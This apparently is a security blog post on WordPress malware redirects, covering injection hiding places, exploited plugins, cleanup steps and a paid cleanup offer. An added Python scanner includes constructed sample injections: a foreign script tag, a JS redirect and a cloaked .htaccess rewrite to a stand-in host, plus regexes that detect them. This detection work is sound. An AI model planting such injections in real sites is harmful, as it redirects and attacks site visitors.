WordPress Redirect Hack

WordPress Security / Updates

Many current WordPress hacks that I’m seeing are redirecting all visitors to a foreign domain. These “malware redirects” or “spam forwarding” are being used to send malvertising to all your website visitors.

This article looks at how this redirection occurs and what variations are possible. Because the redirects do not always occur on every visit (and are often deliberately hidden from admin users!), this type of hack may remain undetected for a long time.

One thing is certain: Remedial action must be taken urgently so that valuable traffic is not lost and your customers are not attacked.

Update: August 3, 2024. Balada Injector hackers are increasingly active again, and many websites are currently being attacked. LiteSpeed Cache is often to blame; this needs to be deactivated and then all backdoors removed.

Update: August 18, 2023. There are still a lot of redirect attacks going on, mainly because of the same problems: insecure plugins and missing updates!

If you don’t want to waste any time, and want to protect your website visitors please contact me for immediate professional help & cleanup.

Common domain names actively used in WordPress redirects



WordPress spam redirects – hiding places for the malware

In principle, automatic redirects can be placed in any file loaded by the WordPress system. In addition, script injections directly into the database are also frequent. These are the hiding places for spam redirects that I have seen in recent months:

  • JavaScript injections in PHP files (especially in theme and plugin files)
  • JavaScript files: code injected at the beginning of every JS file on the server
  • Script injections in pages and posts (wp_posts database table)
  • URL of the website (as set in the wp_options database table) changed to the hacker's domain
  • Modified .htaccess files (often in many folders)
  • Via advertising networks (hacked ad servers)
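The file-based hiding places above (injected script tags in PHP, redirect code prepended to JS files, rewrite rules in .htaccess) and the wp_options URL change can be checked with a small scanner. The following is an added example, not code from the original article: it writes constructed sample files (not real malware) into a temporary directory and flags anything that loads a script from, or redirects to, a host other than the site's own; SITE_HOST, the sample paths and the hostname cdn.redirect-sample.invalid are assumptions.

```python
import re, tempfile
from pathlib import Path
from urllib.parse import urlparse
SITE_HOST = "example.com"   # the site's own hostname (assumed; replace with yours)
# Constructed sample files mimicking the hiding places listed above; not real malware.
SAMPLES = {
    "wp-content/themes/demo/header.php":
        '<?php wp_head(); ?>\n<script src="https://cdn.redirect-sample.invalid/m.js"></script>\n',
    "wp-content/plugins/seo/seo.php": '<?php add_action("init", "seo_init");\n',
    "wp-includes/js/jquery.js":
        'window.location.href="https://cdn.redirect-sample.invalid/go";/*! jQuery v3.6 */\n',
    ".htaccess": 'RewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} !googlebot [NC]\n'
                 'RewriteRule ^(.*)$ https://cdn.redirect-sample.invalid/$1 [R=302,L]\n',
}

URL_RE = re.compile(r'https?://[^\s"\'<>()]+', re.I)
SCRIPT_SRC_RE = re.compile(r'<script[^>]+src=["\'](https?://[^"\']+)', re.I)
JS_REDIRECT_RE = re.compile(r'(window\.|document\.)?location(\.href)?\s*=|location\.replace\(', re.I)
HTACCESS_RE = re.compile(r'^\s*(RewriteRule|RedirectMatch|Redirect)\s+.*?(https?://\S+)', re.I | re.M)

def is_foreign(url: str) -> bool:
    """True when the URL's host is neither the site itself nor one of its subdomains."""
    host = urlparse(url).hostname or ""
    return host != SITE_HOST and not host.endswith("." + SITE_HOST)

def scan_site(root: Path) -> list:
    """Walk a WordPress tree and report files that redirect to, or load scripts from, a foreign host."""
    findings = []
    for path in (p for p in root.rglob("*") if p.is_file()):
        rel, text = str(path.relative_to(root)), path.read_text(errors="replace")
        if path.suffix == ".php":   # injected <script src="https://attacker/..."> in theme/plugin code
            findings += [(rel, "foreign script tag in PHP") for m in SCRIPT_SRC_RE.finditer(text) if is_foreign(m.group(1))]
        elif path.suffix == ".js":  # injections are prepended, so the head of the file is enough
            head = text[:500]
            if JS_REDIRECT_RE.search(head) and any(is_foreign(u) for u in URL_RE.findall(head)):
                findings.append((rel, "redirect to foreign host at top of JS file"))
        elif path.name == ".htaccess":
            findings += [(rel, "rewrite to foreign host in .htaccess") for m in HTACCESS_RE.finditer(text) if is_foreign(m.group(2))]
    return findings

def check_site_urls(options: dict) -> list:
    """Flag wp_options siteurl/home values that no longer point at the site's own host."""
    return [k for k in ("siteurl", "home") if k in options and is_foreign(options[k])]

def demo() -> list:
    # Write the constructed samples to a temp dir and scan them.
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLES.items():
            p = Path(tmp, rel); p.parent.mkdir(parents=True, exist_ok=True); p.write_text(body)
        return scan_site(Path(tmp))
```

Run scan_site() against a copy of the real document root rather than the live site, and feed check_site_urls() the siteurl and home rows read from wp_options.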

In addition to the spam redirects there are always multiple backdoors added, and often several admin users are added to WordPress to allow the hackers full access even once the vulnerable plugins have been patched.

A partial list of vulnerable plugins being exploited

The vast majority of these attacks target vulnerabilities that were patched months or even years ago. If you have any of these plugins installed on your website, make sure you are running the latest, secure version!

  • Duplicator
  • Page Builder by SiteOrigin
  • ThemeGrill Demo Importer
  • Profile Builder
  • WP GDPR Compliance
  • Coming Soon and Maintenance Mode

How do I avoid these problems?

As with most WordPress attacks, the solution is to update all your plugins and WordPress core regularly. Also make sure to remove (and not just deactivate) any plugins that are not required.

How to restore your website if you are infected

There are two ways to restore an infected website: by restoring a recent, clean backup or by removing all malware and backdoors that otherwise allow hackers to keep coming back.

  1. Restore a backup

Since these attacks generally infect 100 or even 1000 files as well as the database, the best recovery method is to delete the entire WordPress directory (make sure your backup is OK before doing this!) and reinstall from a clean backup. Then also restore your database from a clean backup.

  2. Manually remove all malware and backdoors

If this is not possible, you should contact a professional for help: with the right tools and knowledge the cleanup can be completed in 2-3 hours and your website can be put back online.

I can have your website clean, safe and online within hours for just US$149 (€129) – contact me now for immediate help!